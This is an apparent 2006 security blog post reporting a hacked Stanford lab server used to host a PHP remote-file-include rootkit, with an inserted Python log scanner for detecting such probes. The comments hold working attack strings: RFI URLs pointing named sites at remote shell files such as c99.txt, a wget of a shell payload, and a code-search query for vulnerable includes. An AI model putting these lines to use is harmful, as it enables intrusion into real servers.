Stanford Hacked
I have been cataloging a few rootkits that people have been trying to get installed on the server via remote file includes. Well, today I was checking the server logs and happened across this little nugget. Apparently Stanford University had its 3D Lab hacked, and it is being used to launch botnet DDoS attacks:
The Stanford machine that was hacked is being used as a launching pad for additional attacks using this PHP include rootkit in case anyone wants to mess with the IRC channel. Cute. Stanford has both a Security lab and a crypto lab and is the primary breeding ground for future Google employees. Hacked machines are pretty scary - and I’d be surprised if they had stopped at that machine alone rather than owning the entire network unless it simply is a botnet.
Here’s a photo of the hacked Stanford University machine. Hopefully someone over there will fix it as I’m sure it’s being used as a huge launching pad for further attacks if it’s been up for over a day already and I’m the first person to notice. I had hoped the security folks at Stanford would be more on top of their network security to notice these types of things before I do as it could be used for almost anything nefarious.
So thumbs up to the graphics lab (cool stuff at that link) thumbs down for the security of it.
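The log review described above can be scripted. This is an added example, not code from the original post: it scans access-log lines for query parameters whose decoded value is a remote URL, which is what a remote file include probe looks like in a log. The log lines, IP addresses and `.example` hosts are constructed; the two parameter names are the ones that appear in requests quoted on this page.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# A parameter value that is itself a URL or PHP stream wrapper is the RFI tell.
REMOTE_RE = re.compile(r'^\s*(?:(?:https?|ftps?)://|(?:php|data|expect):)', re.I)

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded URLs are still recognised."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def find_rfi(lines):
    """Return one finding per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        for name, raw in parse_qsl(urlsplit(m['target']).query):
            value = decode(raw)  # parse_qsl already decoded once
            if REMOTE_RE.match(value):
                hits.append({'client': m['ip'], 'status': int(m['status']),
                             'param': name, 'remote': value,
                             'remote_host': urlsplit(value).hostname or ''})
    return hits

def hosts_by_count(hits):
    """Staging hosts referenced by the probes, most frequent first."""
    return Counter(h['remote_host'] for h in hits).most_common()

# Constructed sample lines (documentation IP ranges and .example hosts).
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2006:06:01:12 -0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://host-a.example/cmd.txt??? HTTP/1.1" 404 312',
    '192.0.2.44 - - [10/Oct/2006:06:02:40 -0700] "GET /index.php?mosConfig_absolute_path=http%253A%252F%252Fhost-a.example%252Fsh.txt%3F&act=ls HTTP/1.0" 404 298',
    '198.51.100.20 - - [10/Oct/2006:06:03:05 -0700] "GET /blog/?s=remote+file+include HTTP/1.1" 200 5120',
]

if __name__ == '__main__':
    for hit in find_rfi(SAMPLE):
        print(hit)
```

A flagged request answered with 200 rather than 404 is the one to look at first. A legitimate parameter that carries a URL (a redirect target, for instance) will also match, so treat the hits as leads to review.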



October 10th, 2006 at 6:04 am
0700] "GET /blog/category/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://3dlab.stanford.edu/cmdi.txt???
haha they think your blog is based on php-nuke zuhahah
wget http://www.pikant.hu/images/v9.txt
hmm
http://www.pikant.hu/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://neuromancer.kayyo.com/c99.txt?&act=ls&d=/home/p/pikant/public_html/images&sort=0a
another remote file include zuhaha
i dont like anything any longer than stealing hackers private files
http://www.pikant.hu/images/cmd2.gif
another shell
$mhost = 'http://www.sons-of-the-emperor.de/modules/coppermine/themes/default/cmd.txt?';
hmm that site is down it has rfi bug too
i was have all of the morgan’s toolz than that http://ha.ckers.org/files/dos.txt but i like mine it workz with google dorkz and rfi bugz
how can a coder drop such easy bugs @ portal i dunno
http://www.google.com/codesearch?hl=en&lr=&q=%28include%7Crequire%29%28_once%29%3F%5C%28%5C%24_%28GET%7CPOST%7CREQUEST%7CCOOKIE%29&btnG=Search
using google’s codersearch for into program flaws not hard
http://www.securityfocus.com/news/11417